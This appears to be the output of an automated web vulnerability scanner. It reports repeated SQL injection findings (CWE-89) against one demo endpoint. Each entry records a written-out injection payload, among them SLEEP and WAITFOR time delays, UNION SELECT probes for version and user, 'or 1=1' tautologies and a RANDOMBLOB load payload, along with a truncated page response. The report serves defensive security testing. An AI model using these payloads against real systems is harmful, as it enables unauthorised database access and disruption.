https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1326\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AnD SLEEP(5) ANd '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1327Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1328\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1329\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1330\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \";waitfor delay '0:0:5'--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1331\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1332Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1333\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1083=1083 AND ('1427=\n1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1334\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1335\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# RANDOMBLOB(1000000000\n/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1336\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1337\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1338\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1339\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap 